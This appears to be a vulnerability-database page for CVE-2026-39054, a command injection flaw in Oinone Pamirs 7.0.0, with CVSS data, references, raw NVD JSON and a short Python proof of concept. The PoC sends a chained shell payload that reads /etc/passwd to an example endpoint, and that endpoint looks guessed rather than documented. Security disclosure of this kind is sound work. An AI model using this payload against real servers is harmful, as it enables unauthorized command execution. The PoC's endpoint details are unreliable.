CVE-2026-39054

Description

Oinone Pamirs 7.0.0 contains a command injection vulnerability in CommandHelper.executeCommands. The method starts a shell process and writes attacker-controlled command strings directly to the process standard input without sanitization. In affected deployments, this can result in arbitrary operating system command execution.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Oinone Pamirs 7.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Example)
target_url = "http://vulnerable-server:8080/api/command/execute"

# Vulnerability: Unfiltered input written to shell stdin
# Payload: Using semicolon to chain commands
test_payload = "echo 'Vulnerable' > /tmp/poc.txt; cat /etc/passwd"

# Sending the request
try:
    response = requests.post(target_url, json={"cmd": test_payload})
    print("[+] Payload sent")
    print("[+] Status Code:", response.status_code)
    print("[+] Response:", response.text)
except Exception as e:
    print("[-] Error:", e)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-39054
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-39054
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-39054/
[4] VulDB https://vuldb.com/cve/CVE-2026-39054
[5] https://gist.github.com/Misakim1/859c3eb9ced699089ee0747dae9bedc1
[6] https://github.com/oinone/oinone-pamirs
[7] https://www.oinone.top/changelog

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-39054", "sourceIdentifier": "[email protected]", "published": "2026-05-15T15:16:51.753", "lastModified": "2026-05-15T16:16:14.763", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Oinone Pamirs 7.0.0 contains a command injection vulnerability in CommandHelper.executeCommands. The method starts a shell process and writes attacker-controlled command strings directly to the process standard input without sanitization. In affected deployments, this can result in arbitrary operating system command execution."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "references": [{"url": "https://gist.github.com/Misakim1/859c3eb9ced699089ee0747dae9bedc1", "source": "[email protected]"}, {"url": "https://github.com/oinone/oinone-pamirs", "source": "[email protected]"}, {"url": "https://www.oinone.top/changelog", "source": "[email protected]"}]}}